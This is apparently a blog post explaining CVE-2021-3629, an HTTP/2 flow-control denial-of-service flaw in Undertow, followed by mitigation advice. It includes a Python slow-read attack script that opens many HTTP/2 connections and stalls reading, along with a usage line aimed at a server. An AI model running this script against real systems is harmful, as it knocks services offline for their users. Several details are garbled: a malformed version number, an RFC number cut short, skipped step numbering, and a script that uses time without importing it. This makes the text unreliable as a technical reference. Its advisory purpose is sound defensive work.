TL;DR:
A flaw in Undertow’s HTTP/2 flow control, tracked as CVE-2021-3629, could let browsers overload a server and cause denial-of-service (DoS). This post breaks down how this bug works, shows some code snippets, how it can be used for an exploit, and gives resources to learn more and fix vulnerable systems.
What Is CVE-2021-3629?
>CVE-2021-3629 is a denial-of-service vulnerability found in Undertow, a popular Java-based web server and servlet container.
>
>Affected Versions:
>- Undertow prior to 2..40.Final
>- Undertow prior to 2.2.11.Final
The main problem: Poor handling of HTTP/2 flow control between the browser and the server. Attackers can abuse this to use up tons of server resources, potentially crashing or freezing it.
Why It Matters
Undertow is widely used—directly or inside other products like JBoss/WildFly, Spring Boot, and more. If you run an old Undertow version and expose HTTP/2, your server could be a sitting duck for a simple DoS attack.
The impact: Breaking your app’s availability and giving attackers an easy way to disrupt service for real users.
How Does The Vulnerability Work?
HTTP/2 uses flow control for streams of communication to balance traffic and resources. The server has to manage windows for each request.
But in vulnerable Undertow versions, the server’s response to aggressive flow control from a client is weak. If an attacker’s browser opens multiple HTTP/2 streams, requests large responses, then slows the reading of data (creates backpressure), the server ends up using more and more memory and threads to try to keep up—even for requests the attacker never lets finish!
This eventually exhausts server resources—denial of service.
Here’s a conceptual exploit flow
1. An attacker opens lots of parallel HTTP/2 connections.
Requests big responses (like a big image or file).
3. The attacker slows down reading from the server: reads a few bytes, then stops for a while, keeping each connection open.
4. The server, failing to free up resources, gets bogged down—memory fills up, CPU spikes, and new connections slow or fail.
### Example: Slow HTTP/2 Request in Python
A simple Python script using hyper-h2 and sockets could reproduce the issue
import socket
import ssl
from h2.config import H2Configuration
from h2.connection import H2Connection
def slow_http2_attack(target_host, target_port=443, path='/', num_streams=100):
context = ssl.create_default_context()
for _ in range(num_streams):
sock = socket.create_connection((target_host, target_port))
tls_sock = context.wrap_socket(sock, server_hostname=target_host)
config = H2Configuration(client_side=True, header_encoding='utf-8')
h2_conn = H2Connection(config=config)
h2_conn.initiate_connection()
tls_sock.sendall(h2_conn.data_to_send())
headers = [
(':method', 'GET'),
(':authority', target_host),
(':scheme', 'https'),
(':path', path),
]
h2_conn.send_headers(1, headers)
tls_sock.sendall(h2_conn.data_to_send())
# Read a small window, stall reading to simulate slow client
received = tls_sock.recv(1024)
time.sleep(30) # Hold connection open
# Usage
slow_http2_attack('your-vulnerable-server.com', 8443)
Warning:
Do NOT run this without permission. Test only in controlled environments!
Upgrading is the best mitigation.
Upgrade Undertow:
If you can’t upgrade right away
- Disable HTTP/2 if it’s not needed.
- Monitor your server for strange spikes in HTTP/2 connections, memory, or CPU usage.
Extra Resources and References
- Red Hat Security Advisory (rhsa-2021-2953)
- MITRE CVE Record for CVE-2021-3629
- Undertow GitHub Repository
- Undertow Release Notes
- HTTP/2 RFC 754 - Section 5.2 (Flow Control)
Final Thoughts
Bugs like CVE-2021-3629 reveal how web performance features like HTTP/2, when mishandled, can open doors to new types of DoS attacks. If you use Undertow, update ASAP and always stay on top of security fixes.
Want to check your Undertow version & config? Run
mvn dependency:tree | grep undertow
Or look for undertow version strings in your deployment logs.
Timeline
Published on: 05/24/2022 19:15:00 UTC
Last modified on: 07/29/2022 20:15:00 UTC